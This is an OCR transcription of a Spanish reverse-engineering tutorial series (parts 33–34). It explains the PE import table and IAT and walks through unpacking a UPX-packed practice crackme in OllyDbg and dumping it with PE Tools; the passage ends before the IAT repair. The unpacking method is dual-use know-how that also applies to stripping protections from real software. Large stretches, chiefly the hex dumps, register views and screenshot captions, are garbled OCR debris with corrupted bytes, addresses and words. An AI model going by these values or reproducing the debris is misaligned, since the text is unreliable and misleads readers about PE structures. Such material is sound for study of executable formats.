DC314000 
EO314000 
E4314000 
Es3314000 
EC314000 
Fo314000 
F4314000 
F3314000 


DDD 


a] 
DO 

Y pr po po (E 
ONDA m 


DO: 
DOS 


DD 


DO 


1% 
a 


aa 
DO 
aaa 


DAMON 


DD 
IDO 
Y 


y 


DDD 


od 
DOE 
DO 


Los JUMPS estan lo unico que falta es hacer funcionar el sistema de que llene la IAT con el 
contenido correcto, para que tenga en la misma antes de correr el programa, los punteros a las 
strings y que el sistema lo llene con las direciones correctas sin error. 


Antes de acometer esta tarea veremos las definiciones y ubicación correcta en el programa original 
sin empacar de la [AT y la IT. 


Abramos el CC original en OLLYDBG. 


[c] File View Debug Plugins Options “Window Help 


tl] ea] vil sida] el il ijejmjriwjn]cj/[e]e]r]-[s] 519] 


a 10 PUSH B pModule = NUI 
7 ES FFO40000 GetModu leHandleA 
AS CA2040BaA MOV DWORD PTR DS: [4020CA],EAX 
5A 66 PUSH M Title = MULE 
623 F4204000 |PUSH 4020F4 [stas = "No need to disasm the codet” 
ES A644000B FindtlindowA 
. BBC OR EAX, EAX 
.v 74 B1 CRACKME. 604561510 


.« [3 
> FAR Ad2AAAL MANU MNR PTR NS: 144244471. 44A2 


Bueno ubicaremos las partes que hacen que este sistema funcione bien en el original. 
En el header, tenemos algunos punteros importantes. 


Vayamos al mismo 


Enter expression to follow in Dump 


(x 


[4080590 y] 


Cancel 


CRACKME. <Modu leEntruPoint> 


M2P.O... 
A 


Bd... 


Ar 

tOBL=*EE 
This pro 
gram mus 
t be run 
under U 
in32..57 


B 
a 
ja 
a 
B 
B 
B 
40 


Fa 
o 
5 
E 
o 
o 
o 
o 
o 
E 
5 
o 
Ey 
o 
o 
o 
o 


Ahora cambiemoslo a modo SPECIAL-PE HEADER 


CRACKME. <Modu leEntruPoint 


danes Tres uno — Tora 7 Comment 
40 SA ASCII m2” DOS EXE Signature 


DOS_PartPag = (88.) 
DOS_Pagelnt = 
DOS_Relolnt = A 
DOS_HdrSize = 4 
DOS_MinMern E 


= (15) 
DOS_MaxMem = FFFF (65535. ) 
DOS_Reloss = AB 
DOS_ExeSsP = BS 
DOS_ChkSum = A 
DOS_ExeIP = MB 
DOS_ReloCs = A 
DOS_TablOff = 48 
DOS_Overlay = 1A 


Bajemos 


Offset to PE signature 


e 


Los datos realmente empiezan en 100 donde comienza la PE SIGNATURE 


DOS 


[515] DE 00 

56 45 00 A ASCII PE” PE signature (PE 
4C61 Di B14C Machine = TRAGE FILE_MACHINE_I386 
[s[=1515) Bun6 NumberOfSections = 6 
29240904 BAD9I2429 TimeDateStamp = AD92429 
5JaJ5/5]5/5]5]5) (5]5J5]5]515]3]5) PointerToSymbolTable = 
(sJsJals]s151515) (9JaJs 15151515) NumberO0fSymbols = A 
Size0fOpt ¡ona lHeader = E .) 
Characteristics = ENECUTABLÉ. IMAGE! 32BIT_ 
MagicNumber = PE32 

MajorLinkerVersion 


19 19 MinorLinkerVersion = 19 (25.) 
(5/5/5/35]515]5] (9J5J5J15/3515] Size0fCode = 600 (1536.) 

BOZ220000 BuBBZ200 Size0fInitializedData = 2200 (8704.) 
(9/s/aJ5]5]515]5] 19JaJsJ515151515] SizeO0fUninitializedData = B 


60100000 001006 AddressOfEntryPoint = 1000 
60100000 0061006 BaseDfCode = 1006 
0200000 0002000 BaseDfData = 2000 


160004000 00400008 ImageBase = 400000 


El chico no miente alli empieza jeje en 400100 o sea en offset 100. 


6646017C| 46000609 [DD 6004BB46 Export Table size = 46 (78.) 
bo4BB1so pO300600 (DD 00BB300S Import Table address = 3000 

aa4 70660008 |DD 04BBBE7D Import Table size = 670 (1648.) 
au4 60600008 (DD BOBMEABa Resource Table address = 6000 

arAA lata t Or 1arad ACAraraía MM rarararad ACara Darminarm Tabla inn — TAÍA (01 DA Y 


alli tenemos los punteros a la IT o sea la Import Table que no debemos confundirla con la IAT a 
pesar de que tengan nombres parecidos. 


TIT= IMPORT TABLE 
IAT=IMPORT ADDRESS TABLE 


Como ya vimos la TIAT es el deposito donde el sistema guarda las direcciones correctas de mi 
maquina al arrancar, y que es la IT, pues vayamos alli, como vemos dice que empieza en 3000 


(403000) y su largo es 670 o sea que termina en 403670, vayamos a mirar. 


Como esta fuera del header quitamos el MODO SPECIAL-PE HEADER 


CRACKME. <Modu leEntruPoint> 


A AA SE 
00403000 Ys 30 06 06 00 00 60 60 66 00 06 06 960 32 60 BO |HO..oooooo.«Elo. 
3/84 31 00 60 10 31 60 66 00 BO 66 00 BO BB 00M DO |31l..Pl....oo.... 
9B 32 06 00 1C 32 00 66 3C 31 66 00 00 BO 00 00|s2..L2..< ld... .... 
3/60 06 00 60 AS 32 BO 66 438 32 66 06 4C 31 06 D0/....¿2..H2..L1.. 
3/60 06 00 60 00 00 60 66 ES 32 06 00 53 32 00 DO ....oo. «Ale. AZe. 
74 31 060 00 66 06 00 66 06 00 60 00 EF 32 00 00 tl...ooooo...12.. 
30 32 06 00 66 060 00 60 00 00 60 00 00 00 00 DO Cl.ccccnmocmm... 
60 66 06 600 66 06 00 66 CC 32 66 06 DS 32 00 D0|....oo..lr2..12.. 
J|EC 32 06 06 FA 32 60 BO BE 33 00 06 1C 33 00 00/y2..:2..83..L3.. 
2C 33 06 60 3A 33 00 66 46 33 BB 06 54 33 06 00/,3..:3..F3..T3.. 
60 33 06 00 6E 33 00 66 36 33 66 06 SC 33 06 00/*3..n3..063..13.. 
3/9E 33 00 60 Bó6 33 60 66 C4 33 66 06 DS 33 06 00/x3..43..-3..13.. 
E4 33 06 00 F2 33 00 66 02 34 60 00 DE 34 00 00/53..=3..04..M4.. 
3/1E 34 00 60 2E 34 60 06 40 34 66 00 4E 34 00 D0/d44...4..04..N4.. 

60 34 00 00 72 34 00 66 384 34 60 06 938 34 00 00/*4..14..34..U4.. 
R6 34 00 06 B2 34 60 BO BE 34 00 06 CC 34 00 00/24. .84..%4..lr4.. 
D4 34 06 00 E2 34 60 60 F4 34 00 06 00 00 60 B0/E4..04..M...... 
02 35 60 00 12 35 00 00 1E 35 00 60 2C 35 60 BO|85..$5..d5...S.. 
3A 35 06 00 44 35 00 66 52 35 BB 00 SE 35 06 00/:5..DS..RS..%S.. 
3/72 35 00 60 7E 35 60 06 060 60 66 00 SC 35 00 BO0|r5.. "Sic... lS.. 
3/A2 35 00 60 E4 35 60 06 00 BO 66 00 [4 35 00 DO0/65..JS.....«—S.. 
3/06 35 00 60 DC 35 60 06 ES 35 06 00 FA 35 00 00/55. .m5.+.PS..:S.. 
3/60 36 00 60 16 36 60 06 20 36 06 00 30 36 00 D0|.6...b.. 6..06.. 
3/00 00 060 06 3C 36 60 60 59 36 00 06 64 36 60 B0|....<6..P6..d6.. 
6 06 06 66 42 SC Di 77 9D SF Di 77 SE 0B D2 77 /....BLIWOAIW>3Ew 
24 15 D3 77 4C€ 1F DS 77 D4 B6 Di 77 ES BF D2 77 | 53EWLYEWEADWbr*EWw 
3/24 13 D2 77 DA SE D2 77 66 DA Di 77 EA 04 DS 77/SllEwroEw" rówue'w 
11 12 D2 77 35 EE D3 77 FS BS Di 77 9C FA D2 77] 4tEwS"EvEADWw£: Ew 
EC DB Di 77 F6 8B Di 77 83 F? D4 77 A4 DS Di 77 yildw+10wa-Ewñ 1 0w 
9A F3 D2 77 2E 8C Di 77 18 CO Di 77 F9 D? Di 77] U%Ew. 10wt +Ow-10w 

8C 14 D2 77 69 B6 Di 77 SE 02 D2 77 EE D4 Di 77| 1UEw. A0w"BEW"ED0W 
3110 Bi D3 77 BS 96 Di 77 9C F3 D4 77 50 62 D2 77 | CREWOIDWEMEWPDEW 
10 E6 Di 77 81 ES D2 77 C7 86 Di 77 16 48 D2 77] +A0wiidEwA30w. HEW 
3/18 AC D6 77 42 10 D2 77 06 Ba 66 06 C1 CS 80 7C| da IWBREW... ro: 
3/99 6B 82 7C 2F FE 80 7C 2D FF 80 7C E0 Có 80 7C|Uks:/mci- CióSC; 


DOE 


36 $8B C6 58 00 00 00 BB BC BC EF 77 26 Fi FO PP ;18X.....l wét- 
E9 49 F2 77 68 Eb EF 77? El 61 EF 77 C9 DD Fa 7? ¿1=uhó uba WiFi - 
3/51 E6 FA 77 2D 6C EF 77 98 6E EF 77 60 09 09 B0|06-w-l"wún” ea 
DS 7C 37 76 1E 31 236 76 CD 46 38 76 00 BB 00 B0/1¡7vál6u=FS4.... 
55 53 45 52 33 32 2E 64 6C 6C BAM 4B 45 52 4E 45| USER32. dl l.KERNE 
4C 33 32 2E 64 €C 6. BB 43 4F 4D 43 54 4€ 33 32 L32.d1!.COMCTL32 
2E 44 4C 4C Bb 47 44 49 33 32 2E 64 6€C 6€C MB 43| .DLL.GDI32.d1!.C 
3/4F 4D 44 4C 47 33 32 2E 64 6€C €. 660 Ba 66 4B 69/0MDLG32.dll...Ki 
3160 6C 54 69 6D €5 72 06 00 BB 47 65 74 53 79 73| |lTimer...GetSys 
74 65 6D 4D 65 74 72 69 63 73 BB 00 00 BB 40 6F| temMetrics....Lo 
3/61 64 43 75 72 73 6F 72 41 BO 06 64M 40 6F 61 64| adCursorA. . «Load 
41 63 63 65 £€C 65 72 61 74 6F 72 73 41 60 00 B0|AcceleratorsA... 
40 65 73 73 61 67 65 42 65 65 76 00 00 BO 47 65| MessageBeep. . .Ge 
74 57 69 6E 64 6F 77 52 65 63 74 60 60 BB 40 EF | tllindowRect...Lo 
61 64 53 74 72 69 6E 67 41 00 BB BA 40 6F 61 64 adStringA...Load 
31/49 63 6F 6E 41 00 BB 66 4C 6F 61 64 42 69 74 6D| IconA...LoadBitnm 
3/61 76 41 BOB 66 00 53 65 74 46 EF 63 75 73 00 BB|apA...SetFocus.. 
3/60 06 40 65 73 73 61 67 65 42 6F 78 41 00 00 BO0|..MessageBoxA... 
z 6l e 


Dí 


y 


Da 
De 


DOI 


fafola 
bb 


Y 


Esto que parece un chorizo sin interpretacion posible, es facil de interpretar, si sabemos que es cada 
cosa, lo detallaremos y veran que esto es muy importante. 


Esto es la famosa IT, aquí la tenemos si comprendemos esto, y aunque no sepamos los nombres de 
cada puntero, sepamos que es cada cosa y donde apunta, pues estamos salvados. 


Lo malo que tenemos para explicar esto en OLLYDBG es que es mucho mas comodo y visible 
hacerlo en una visualizacion de 5 columnas asi queda ordenado, ya veremos por que. 


La famosa IT esta compuesta por los denominados IMAGE IMPORT DESCRIPTORs que son 
varias lineas de 5 valores dword, de la cual hay una por cada dll que cargara el programa. 
Veamos la IT, por eso les digo que esto se ve mejor con 5 columnas para ordenar cada IID uno en 


cada linea. 


Pero bueno no nos queda otra aquí vemos el primero 


CRACKME. < 


¡DADA 
DOS 


DI 


oa aaa 
DOS 


2) OriginalFirtsThunks. 


3) TimeDateStamp. 
4) ForwarderChain. 


5) Puntero al nombre de la dll. 


ModuleEntruPoint> 


Ha lee 
al poco, 
Potro ode dÓ 
so. ¿2..H2..Li.. 
n...... «fs. .. 
tloconcossoo Zas 
Glanananannns 


nooosoasa [Lon iZ.. 


Yy2..:2..M3..13.. 


e A A A E A 
¿e 04..H$4.. 


..12..F3..13.. 
*3..n3..3..13.. 


6) FirtsThunk (Apunta a donde debe buscar en la IAT la primera entrada de dicha dll). 


Los tres primeros no son importantes para el cracking hasta siendo cero, normalmente arranca igual el 
programa, son para usos muy determinados, los importantes son el 4 y el 5to puntero de nuestro primer IID. 


h 


Alli esta como vemos el 4to apunta al 


403290. 


DOE 
DO 
DI 


hoj 


Y 
DOS 
. Do 
, 
, 
= 
Le 
lx 
wm 
1) 


DO 
DOE 
E 


Alli esta la primera dll que el sistema buscara es USER32.dll y el 5to puntero marca donde comienza en la 


o 
nm: 
000 | 
mado: 
50 00 


DOS: 
Dana 
OTmon 
DER 
DOR00w 


pogo 
Ln 
po pu 
ma 
uE 


TAT las entradas de esta dll, en este caso es 403184. 


CRACKME. 


Alli esta es la IAT, y su primera entrada, todo esto esta dentro de la IT, ya que terminaba en 403670, asi que 
tenemos que la famosa IT, tiene una linea para cada dll, estas lineas son llamadas IID o IMAGE IMPORT 
DESCRIPTOR y dentro de la IT esta la IAT o deposito de las direcciones de las apis, todo compacto y para 


el uso del sistema. 


<ModuleEntruPoint> 


bu Bu 06 
0 60 06 
BB 30 31 
0 48 32 
00 ES 32 
00 60 06 


EN] 
115] 
115] 
1515] 
1515] 
1515] 


cual pertenece este IID, veamos cual es la dll en 


AS TS 
Ul=whó"wBa'wIF!-w 
DÓ6-w-L"WUN"W.... 
1T¡7UAlOVAFDUV.... 
USER32.dll.KERNE 
L32.d11.COMCTL32 
«DLL.GDI32.d11.C 
OMDLG32.dll...Ki 
liTimer...GetSys 
temMetrics....Lo 
adCursorHA.. «Load 
AcceleratorsH... 


BLOWDADW>3EWF3 EW 
LYEVEADWbREWS !Ew 
rev" rOwue'wétEw 
S EVIADWE£: EwylOw 
+(0w3-+Ewh 1 0wiEw 
A 
«AIWPDEW EDWLÉEW 
Di0WEREWPDEWA DW 
¡dEWÁSOW. HEwd!á Tw 
a E úkei 

eGi- CiÓ 3 iwWsG! 
PRD A CIAT ió: 
E dt ES 
no... "We2-WUI=w 


hó"wBa' wIF!-wGIÓ -w 


Muchos crackres experimentados diran que no siempre la IAT esta dentro de la I'T, ya que el 5to puntero de 
cada IID puede apuntar a cualquier lado y tranquilamente puede estar fuera, ubicada en cualquier lugar del 
programa que tenga permiso de escritura, para que cuando arranque el exe, alli el sistema vaya guardando las 
direcciones correctas de las apis, la cuestion es que ya vemos como trabaja mejor el sistema para llenar la 
TAT, 


5) Busca la IT 

6) Busca la primera IID y se fija en el 4to puntero a que dll pertenece 

7) Luego mira en el 5to puntero donde esta la primera entrada de la IAT 

8) Alli hay un puntero a la string con el nombre de la api 

9) Con GetProcAddress busca la direccion y la guarda en la misma entrada. 

10) Cuando encuentra en la IAT una entrada con ceros, eso le indica que termino la primera dll y que 
debe pasar a mirar el segundo IID para buscar cual es la segunda, y repetir el proceso. 


O sea que si el sistema hara esto en imagenes y es importante que lo entiendan bien porque si al sistema le 
falta algo o encuentra punteros incorrectos dara error y es importante entenderlo a fondo. 


1)Busca la direccion de la IT 


"1 
Y 
Y 


0040 DD 60000046 Export Table size = 46 (78.) 
Bau40 DD 604Bs3aBa Import Table address = 3000 
0u4D DD 60046570 Import Table size = 670 (1648. ) 
Bu4a sis ls15[351515) Resource Table address = 6000 


1 
) 
) 
) 
pay 
o 
xXx 
“Y 
. 
. 
m, 
39 


EAS AA 
AS A 
«.««¿2..H2..Li.. 
conde k2o 


tlococoonmo.. da. 


Da 
HD 


Y 


Dí 


DI 


ad 


Connacoooooaaoo 


REI ME 
Y2..:2..M3...3.. 


a EA ra 


3. 3... 13... 
ner ra La] = 


Y 


1 
DO 


Y 
Y 


3)En el primer IID busca el 4to DWORD que le apunta al nombre de la dll donde empezara a trabajar en este 
caso sera USER32.dll. 


CRACKME. <Modu leEntryuPoint> 


| Address [Hex dump______ | 
96155 53 45 52 33 32 2E 64 6C 6. 66 46 45 52 4E 45/ USER32.dl |. KERNE 
AB|4C 33 32 2E 64 6C 6C BB 43 4F 4D 43 54 4C 33 32/L32.dl!l.COMCTL32 
2E 44 4C 4C Bb 47 44 49 33 32 2E 64 6C 6. BB 43| .DLL.GDI32.d11.C 
4F 4D 44 4C 47 33 32 2E 64 6€C €. 64 66 66 4B 69/ OMDLG32.dll...Ki 
lLiTimer. ..GetSys 
temMletrics....Lo 
adCursorA.. .Load 

6 AcceleratorsA... 
40 65 73 73 61 67 65 42 65 65 70 00 00 66 47 65| MessageBeep. ..Ge 
74 57 69 6E 64 6F 77 52 65 63 74 00 66 BA 40 EF | tilindowRect...Lo 
61 64 53 74 72 69 6E 67 41 BB 00 66 40 6F 61 64 adStringA...Load 
1149 63 6F 6E 41 00 66 BB 40 6F 61 64 42 69 74 6D IconA...LoadBitm 
2161 76 41 00 00 66 53 65 74 46 6F 63 75 73 00 B0|apA...SetFocus.. 
.««MessageBoxAs.. 
PostQuitMessage. 


o 
IDO 
Dm 
O 
Dm 
O 
n 
ES 
m 
0 
m 
|=] 
m 
n 
5] 
1] 
o 
la] 
o 
a] 
o 
ll] 
Le 
y 
m 
an 
e] 
PS 
n 
0 
e] 
wD 
y 
0] 


5 
O 
m 
-. 
m 
.S 
He 
0 
y 
Á 
y 
ro 
y 
w 
m 
AL 
y 
ro 
ns 
-o 
o 
le 
o 
la] 
o 
6] 
H 
o 
m 
a] 
m 
rs 
m 
ns 


DOS 
Hm-J 
Ror 
m 
main 
Nh 
uo 
Ma 
nano 
DD 
Ord 
Ds a] 
na 
A Eu] 
mmm 
e Ed 
ru 
“y A dr 
Hr 
uds] 
Nu 
JD 
NOD 
e oi] 
ada 
Ho 
Roa 
poa] 
Sn 
DON 
Dro 
pod 
OAamNn 


IDODOAO 
oa ada 
GS Amo 
y 


H 
o 
E 
o 
o 
Le 
la] 
m 
Ei 
y 
My 
y 
“ 
m 
o 
m 
y 
m 
n 
Se 
mo 
m 
al 
y 
co 
H 
- 
o 
E 
o 
E 
o 
E] 


Luego mira el Sto puntero para buscar la primera entrada de la IAT que es 403184 y va alli. 


CRACKME. <Modu leEntruPoint> 


BLIWOA0W>3EWSF EW 
LTEVEAOWbrxEWS NE 
roEw' rows 'wétEw 
S EWEADW£: EwylOw 
+(0w3+Ewñ 1 0witEw 
« 10wt -Dw- 10w11Ew 


e) 


DOCE 


BALADA 


Dí 


10] 
m 
xa] 
o 
al 
- 
= 
“y 
e 
na] 
] o 
a] 
'SODODODOOO 
Mi a Ph in a to poa poa pr 
= 
e] 
mr! 
pu] 
o 
e] 
o 
- 
= 
y 
[xa] 
o 
. 
Le 
o 
mr 
a] 
a) 


la 
O 


alli ve que el nombre de la primera api esta en 4032CC, va alli 


LRHUKME. <Modu LeEntryFoLnt > 


.«KillTimer...Ge 
tSystemMetrics.. 
««LoadlursorA... 
LoadAcce lerators 
A. . .MessageBeep. 
. «GetilindowRect. 
««LoadStringA... 
LoadIiconA. . «Load 
BitmapA.. .SetFoc 
US. + . «MessageBox 


Ve que la primera api es KillTimer con GetProcAddress halla su direccion que nosotros hallamos con el 
OLLYDBG. 


[00 00 00 008 47 6C EMB2 61 El 46 72 65 65 00 00/....Gl 


Command 2 KillTimer | HEX: 77D18042 - DE 
Program entry point 


Y ese valor que en mi maquina es 77d18c42 lo guarda en la misma entrada de la IAT machacando el 
existente. 


<¿ModuleEntruPoint> 


9D 
77 D4 Lreweadubxews E 


S EWEA0W£: EwylDw 
8 1 +¡0w3-Ewñ 1 0wiEw 
gc Di 7A1 . 10wt -Bw- 101 1Ew 
B6 Di 77 5E «AIWDEW EDWEW 


1F D 
SE D r Ev" rOwue'wé+tEw 
EE D 
BD 


Alli lo vemos es la primera entrada de la IAT ya cuando llego al entry point y muestra el valor que tiene esa 
api en mi maquina. 


Asi saltara a la siguiente entrada de la IAT, que halla facilmente sumandole 4 a esta, y busca el siguiente 
puntero al nombre de la proxima api. 


CRACKME. <Modu leEntruPoint> 


roEvw* riwus'wé+Ew 


FMRE E 


File C:WDocuments and SettingsMRicar doWEscritorio132-IN.. Ea 
Ilan Ylo. 2 BS 


3... 32.13..F3.. UN — 
T13..*3..n3..63.. 
13..X3..43..-3.. 
13..53..=3..04.. 
o 


BR... 0h... ¿áh.. 


32d8 o sea 4032d8, mira el nombre de la api siguiente alli y como no hallo un cero en la entrada, sabe que 
continua con las apis de user32.dll. 


.«GetSystemMetri 
CS... «Loadlursor 
A...LoadAcce lera 
torsA. . .MessageB 
2££DP. + «GetllindowR 
ect. ..LoadString 
A. +. «LoadIconA. . . 


La segunda api es GetSystemMetrics hallara la direccion y la guardara en la segunda entrada de la ¡at y asi, 
seguira buscando apis en user32.dll hasta que llegue a una entrada con todos ceros si vemos la ¡at en el 
ejecutable. 


+. - - - 
IO a ao 243 = PD E 
3 2 00 60 FA 32 00 06 BE 3 B| 12..942..:2..43.. 
BO 66 3A 33 66 06 46 33 E 50 ERE 
0 60 6E 33 66 06 S0 33 06 00/T3..*3..n3..63.. 
00 60 B6 33 66 06 C4 33 06 00/13..*3..43..-3.. 
00 60 F2 33 60 060 02 34 06 00/13..53..=3..04.. 
00 60 2E 34 00 06 40 34 00 00/A4..44...4..04.. 
00 60 72 34 60 060 34 34 00 00/N4..*"4..14..34.. 
00 60 B2 34 00 BO BE 34 00 BO y4..24..884..$4.. 
DO 60 E2 34 60 06 F4 34 00 00 [p4..E4..04..14.. 
00 606 12 35 60 06 1E 35 00 00/....05..$5..45.. 
35 00 00 52 35 60 B0/,5..:5..DS5..RS.. 
00/00 00 00 B0|%5..r5.. "Sono... 
O BO B4 35 06 09 06 00 60 B0/15..Ó5..JS...... 
Se E BG DC 35 06 06 ES 35 600 00 /-5..55..m5..bS.. 
36 60 06 16 36 06 00 20 36 00 BO0/:S...6...6.. 6 
BO 06 00 3C 36 00 BO 5 36 BO 00 06......<6..P6 
BO RO 00 55 53 45 52 33 32 2E 64|d6..... .USER32 
52 45 4C 33 32 2E 64 6€C €C 00| |1.KERNELS2.dl 
40 32 2E 44 4C 4C 00 47 44 49/ COMCTLS32. DLL. G 


15) 


-d 
l. 
ol 


06 06 06 Y E] E] 
34 31 06 06 16 31 60 60 60 00 06 06 066 60 6n 
9B 32 60 06 1C 32 06 66 30 31 BO 00 09 0u an 
00 64 06 00 AS 374 00 60 48 32 BO 66 4C 31 6n 
a ojApO 00 60 560 06 ES 32 06 060 53 32 00 
a174 15/5313] 6 00 00 00 06 00 EF 32 00 
33900 00 00 08 6 


6.609 00 60 06 09 50 66 a 
AA AA AR AR CAR CAR ARA NA 22 AR AR NA 22 ARA AA L........ 152 


Cuyos 4 y 5to puntero son esos, el 4to le dice que en 40320b esta el nombre de la 2 dll donde buscara 
nombres. 


CRACKME. <Modu leEntruPoint 


[Address [Hex dump______ | 


Tata 
E 


KERNEL32. dll. COM 
CTL32.DLL.GDI32. 
dll.COMDLG32.d1L 
«««KillTimer...G 
etSystemiMletrics. 


| On IA 


y 


Lab 


Y 
oo 


Que es Kernel32.dll y la primera entrada de la ¡at donde buscara sera la que esta a continuacion del cero o 
sea 40321c. 


-HEWA RS IWBPEW. .. 
A 
0 Wei RdA 
A ES y 
E A 
£2-wuI=whó"wBa' 
Fi -W06-w-l*wiún"w 
..«.T¡7vál6u=F8u 
...».USER32.dll.K 


LELEX o. 


Alli vemos el cero que determino que no hay mas apis de user32.dll y en 40321c empiezan las de 
Kernel32.dll donde buscara en el ejecutable el primer puntero a la string y llenara aquí con el valor de la api 
correcta. 


Creo que es muy importante entender bien esto, trate de explicarlo y repetirlo varias veces para que quede 
pero creo que con solo una leida eso no queda en la mente traten de grabarselo con fuego pues esto es la base 
de todo el tema de la reconstruccion de las IATs y aunque ya veremos en la parte siguiente que hay tools que 
nos ayudan a hacer el trabajo pesado sin tener que revisar todo esto, es muy importante saber como trabaja 
todo, asi cualquier problema o caso raro, no nos quedaremos a un costado del camino y siempre podremos 
entender que esta pasando. 


En la parte siguiente arreglaremos IAT's no lloren jeje ya tienen suficiente con comprender como trabajan por 


Hasta la 34 
Riardo Narvaja 
27/02/06 


INTRODUCCION AL CRACKING CON OLLYDBG PARTE 34 


En la parte 33 vimos como funciona el sistema de la IT y IAT, yo se y los que saben reparar una 
TAT, pueden pensar que no es necesario saber como funciona, ya que hay tools que reparan una ¡at 
casi automaticamente, pero yo les aseguro que es bueno saber como funciona y que ocurre en cada 
momento, porque hay muchos packers que engañan a las tools y las hacen fallar, por lo cual en esos 
casos hay que saber razonar y pensar que esta pasando para hacer alguna correcion a mano, o poder 
moverse con facilidad. 


Empezaremos con algo facil el Crackme de Cruehead empacado con UPX, realizaremos el proceso 
de desempacado completo aquí para unir todo lo que vimos y al final repararemos la IAT, para que 
quede funcional. 


Como vimos el primer paso era llegar al OEP, por lo cual abro en OLLYDBG el CC o sea el 
Crackme de Cruehead. 


a] 44 x] EU E 2 LjejmT[wHjc 


5 
BB4B9EFR1| > BE 00904000 |MOU ESI, 409000 
pia + S8DBE B0S9FFFI LEA EDI,OWORD PTR DS: [ESI+FFFFS0007 
aB4B9BFC 


a E 
BO4BIEFD| . OR EBP,FFFFFFFF 
PB4B9COB| . JMP SHORT 00489012 CRF 


ARAAIPA? 94 NAaP 


Aplicare el metodo del PUSHAD para llegar al OEP apreto f7 para pasar el PUSHAD. 


Increment Plus 
Decrement Minus ntdll. 
> CRACKM 
ero 32 it 
it 
Set ds 1 S2bit 
Modify Enter 3S> Ls 
t 
Copy selection to clipboard. Ctri+C NULL 
Copy all registers to clipboard ERROR_ 


(NO, NB 


MT to eo 


Follow im Stack 


View MMX registers 


Ahora marco ESP-FOLLOW IN DUMP. 


Y en el dump vere los registros que guardo, y marcare los primeros 4 bytes, y pondre un 
HARDWARE BPX ON ACCESS. 


3 ar 9 E 
FB FD FF 


NS DWORD in e” 
Go to » 


2 éb sí 7c Backup > DO 7F[OmúiS+El .-te 
dolares [ES 39 89 70 Copy > 
B012FFF4/B6 66 66 BE Binary > 
Breakpoint » Memory, on access 
el 54 »| Memory, on write | 


Hardware, on write » El 
Hardware, on execution 


vw Hex » | | 
Text » 


Y doy RUN, parara en el salto al OEP. 


== nie PI 


VEU. MPPLIDIIS 


A 


=— ij + 


$1) 1] + 1]e/m)T]wn]c//]xK/B/r].. 


CRACKNME. 00401006 


Bueno ya estoy en el salto al OEP, apreto f7 y llego al mismo. 


5H Ba 
Es FFO40000 
AS CA204000 


5A Ba 
68 F4204000 
Es A6040000 
BBCO 
74 Bl 


Bueno ya llegamos, 
dumpearemos. 


a -]u] visi $00) +] »l 1]EjmT][wH]c]//K]B/R]--/s] 335 2] 


PUSH A 


PUSH O 
PUSH 4020F4 
OR ERX, ERX 


c3 
CAR A42AGARA 1 MAL AMARA PTR MS: 1442441. 4442 


CALL 08491506 
MOU DWORD PTR DS: [4920CA],EAX 


JMP to kerne 132. GetModu leHandleA 
ASCII "No need to disasm the codet” 
JMP to USER32.FindblindowA 


CRACKME. 604610610 
N 


al punto donde el programa esta desempacado en memoria ahora lo 


Como vimos en partes anteriores, existen muchos dumpeadores, incluso el OLLYDBG tiene un 
plugin llamado OLLYDMP que dumpea muy bien, pero como ya vimos como se hace con el LORD 
PE, ahora utilizaremos PE -TOOLS que pueden bajarse desde: 


http://www .uinc.ru/files/neox/PE_Tools.shtml 


Como nos cansaremos de desempacar, y de practicar mas adelante en futuros desempacados 
tambien usaremos el plugin OLLYDMP asi aprendemos a usar todos. 


Abramos el PE-TOOLS sin cerrar el OLLYDBG que esta detenido en el OEP. 


EX PE Tools v1.5 Xmas Edition - by NEOx/[uinC], http://www. uinc.ru/ 

File Tools Plugins Options Help IS 
O EQ Es 
Path PID Image Base Image Size MN 


Fe:tarchivos de programaltechsmithisnagit 8ltschelp.exe O0000SE4 00400000 00004000 
Ak c:todbgi 10 finaliparcheado 4.exe ooD0008cc 00400000 00153000 


icuments and se 3 ¡escritorio|01-crackmelcrackme.exe DODODEOS 00400000 D000B000 
1 c: documents and settingslricardotescritoriojpe tools v1.5, build 400, christmas editi.... 00000494 — 00400000 D004E000 


Path Image Base Image Size A 
¡DÉ documents and settingslricardoescritorioyescritorioy01-crackmelcrackme.exe 00400000 DO00B000 
3) c:windows!system321ntdll.dl 7C910000 00086000 
E ci windows! system32lkernel32. dll 7C800000 00101000 
E ci windows! system32|comctI32. dll 58C30000 00097000 
E ci windows! system32ladwapi32. dll 77DADODO DODACODO 
e] ci windows! system321rpcrt4. dll 77ESOD0O 00091000 


Processes loaded: 44 SoftICE is not loaded Ae 


Bueno alli esta el proceso que en este caso se llama crackme.exe ya que perdi el que se llamaba 
crackmeUPX y lo hice de nuevo y me olvide de cambiarle el nombre, pero es lo mismo, se llame 
como se llame es el crackme de cruehead empacado con UPX y detenido en el OEP. 


dk c:jodbgí 10 finaliparcheado 4.exe oDo000scc 00: 


Dump Region... 


Path mm 


9] c:documents and settingsiricardolescritorio|escriv8Fio101-crackmelcrac 
MetrindannterirtarmdMintdll ll : 


Get OEP... 


Haciendo click derecho-DUMP FULL 


Save process memory to... 


Guardar en: | (2) PE-Tools Y OP ep 
ES (Plugins [3] UUpdateSystem. dll 
pi 5 (55DK 


Documentos [JSignMan 
recientes (SjURLs 


E) File_id.diz 
(6 E License, txt 
[4] NDump.dll 


E]PEToo!s.exe 
Cd PETOOIs.ini 


7) E Procs32.dll 
(3)PSAPI.DLL 

E Readme_eng.txt 

E Readme_rus,txt 


PE [3]RebPE32.dll 
- E Signs, txt 


Mi PC 
a Nombre: —— ¡Dumped YI Í puuardar | 
Mis sitios de red — Tipo: All Files (*.*) Y 


PE Tools v1.5 Xmas Edition 


. 
1 ) Dumping done !!! 


Bueno ya esta dumpeado ahora vamos a la reparacion de la IAT cerramos el PE TOOLS vimos que 
el DUMPED lo guardo en la carpeta del PE TOOLS, asi que lo buscamos y lo copiamos a la carpeta 
donde esta el mismo Crackme de Cruehead empacado con UPX. 


wy > A [ar > a VUQUEUa uy al POLOS =saj” 


dirección (E) C:¡Documents and Settings|Ricardo|Escritorio_ESCRITORIO(01-Crackme 


Tareas de archivo y carpeta 2 o CRACKME EXE o Dumped.exe 


(Y Crear nueva carpeta 


DA) Publicar esta carpeta en Web 
E Compartir esta carpeta 


Bueno ya sabemos que aun falta reparar la ¡at, igual probamos ver que pasa si lo ejecutamos, 
hacemos doble click en el dumped.exe y.. 


C:Wocuments and SettingsiARicar dolEscritoriolESCRITORIOW1 -CrackmeWumped.exe 


(Xx) C: Documents and Settings|RicardolEscritorio(ESCRITORIO(01-Crackme|Dumped.exe no es una aplicación Win32 


válida, 


Bueno como ven hay que reparar la IAT, aunque corriera en nuestra maquina, debemos reparar la 
IAT para que funcione en cualquier maquina y no solo en la nuestra, para ello usaremos el IMPORT 
